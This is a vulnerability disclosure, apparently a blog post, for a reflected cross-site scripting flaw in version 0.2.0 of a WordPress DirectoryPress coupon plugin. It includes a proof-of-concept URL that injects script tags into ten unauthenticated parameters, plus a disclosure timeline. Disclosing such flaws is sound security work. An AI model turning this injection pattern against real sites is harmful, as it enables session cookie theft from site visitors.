wp-plugin : coupon-tab-for-directorypress-pp – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : coupon-tab-for-directorypress-pp

 

Effected Version : 0.2.0 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 
http://localhost/wp-content/plugins/coupon-tab-for-directorypress-pp/pp-coupon-popup.php?cfh=</style><script>alert(document.cookie)</script>&cc=cc'><script>alert(document.cookie)</script>&cb=cb'><script>alert(document.cookie)</script>&cfd=cfd&ce=ce'><script>alert(document.cookie)</script>&cd=cd'><script>alert(document.cookie)</script>&cdt=cdt'><script>alert(document.cookie)</script>&cdet=cdet'><script>alert(document.cookie)</script>&cs=cs'><script>alert(document.cookie)</script>&cfw=cfw'></style><script>alert(document.cookie)</script>&surl=surl'><script>alert(document.cookie)</script>&

 

Vulnerable Parameter : cfh, cc, cb, cd, ce, cdt, cdet, cs, cfw, surl

 

Type of XSS : Reflected

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-04

 
Plugin Status : Closed
 
Public Disclosure : July 7, 2014
 
CVE Number : Not assigned yet

 
Plugin Description :
 
Coupon Tab (pp-coupon-tab) creates a new tab on the directory
listing page of Directory Press. This tab is titled "Coupon"
and displays the coupons listed by the registered users.

This plugin requires DirectoryPress and has been tested till
version 7.1.3 with a slight modification. Please check
installtion notes for details.

Leave a Reply

Your email address will not be published. Required fields are marked *